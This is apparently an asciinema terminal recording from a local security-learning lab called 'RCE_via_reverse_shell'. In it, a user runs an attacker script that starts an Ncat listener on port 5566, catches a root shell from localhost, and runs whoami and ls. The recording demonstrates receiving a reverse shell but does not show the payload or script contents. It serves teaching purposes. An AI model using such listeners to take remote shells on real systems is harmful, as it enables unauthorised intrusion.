{"version": 2, "width": 102, "height": 52, "timestamp": 1575425148, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.161148, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                     \r \r\u001b]2;root@47aa1ba8d1db: /home/security/learn/code-in/RCE_via_reverse_shell\u0007"]
[0.163715, "o", "\u001b]1;..reverse_shell\u0007"]
[0.232759, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mRCE_via_reverse_shell\u001b[00m \u001b[K"]
[0.23321, "o", "\u001b[?1h\u001b="]
[0.239685, "o", "\u001b[?2004h"]
[1.297195, "o", "."]
[1.386026, "o", "\b./"]
[1.633379, "o", "a"]
[2.056273, "o", "t"]
[2.227681, "o", "t"]
[2.429194, "o", "acker.sh\u001b[1m \u001b[0m"]
[2.883014, "o", "\b\u001b[0m \b"]
[2.884033, "o", "\u001b[?1l\u001b>"]
[2.885878, "o", "\u001b[?2004l\r\r\n"]
[2.89338, "o", "\u001b]2;./attacker.sh\u0007"]
[2.896254, "o", "\u001b]1;./attacker.sh\u0007"]
[2.935825, "o", "Ncat: "]
[2.936487, "o", "Version 7.60 ( https://nmap.org/ncat )"]
[2.936785, "o", "\r\n"]
[2.938367, "o", "Ncat: "]
[2.938672, "o", "Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one."]
[2.938939, "o", "\r\n"]
[2.986396, "o", "Ncat: "]
[2.988604, "o", "SHA-1 fingerprint: 7ABE 6371 B651 0FC1 9A7C 7AD0 DFBF 972A 90B4 85EC"]
[2.995643, "o", "\r\n"]
[3.002961, "o", "Ncat: "]
[3.005593, "o", "Listening on :::5566"]
[3.00768, "o", "\r\n"]
[3.012594, "o", "Ncat: "]
[3.020366, "o", "Listening on 0.0.0.0:5566"]
[3.021624, "o", "\r\n"]
[9.610865, "o", "Ncat: Connection from 127.0.0.1."]
[9.611028, "o", "\r\n"]
[9.614158, "o", "Ncat: Connection from 127.0.0.1:43756.\r\n"]
[9.649124, "o", "# "]
[11.393453, "o", "w"]
[11.470825, "o", "h"]
[11.537975, "o", "o"]
[11.676903, "o", "a"]
[11.811652, "o", "m"]
[11.905605, "o", "i"]
[12.194217, "o", "\r\n"]
[12.201791, "o", "root\r\n# "]
[17.218247, "o", "l"]
[17.391153, "o", "s"]
[19.169385, "o", "\r\n"]
[19.182055, "o", "attacker.cast\r\n"]
[19.184635, "o", "attacker.sh"]
[19.187052, "o", "\r\n"]
[19.188493, "o", "victim.cast"]
[19.189607, "o", "\r\n"]
[19.198445, "o", "victim.py\r\nvictim.sh\r\n"]
[19.211146, "o", "# "]
[20.680484, "o", "\r\n"]
[20.713292, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                     \r \r\u001b]2;root@47aa1ba8d1db: /home/security/learn/code-in/RCE_via_reverse_shell\u0007"]
[20.713469, "o", "\u001b]1;..reverse_shell\u0007"]
[20.799533, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mRCE_via_reverse_shell\u001b[00m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[22.351763, "o", "\u001b[?2004l\r\r\n"]
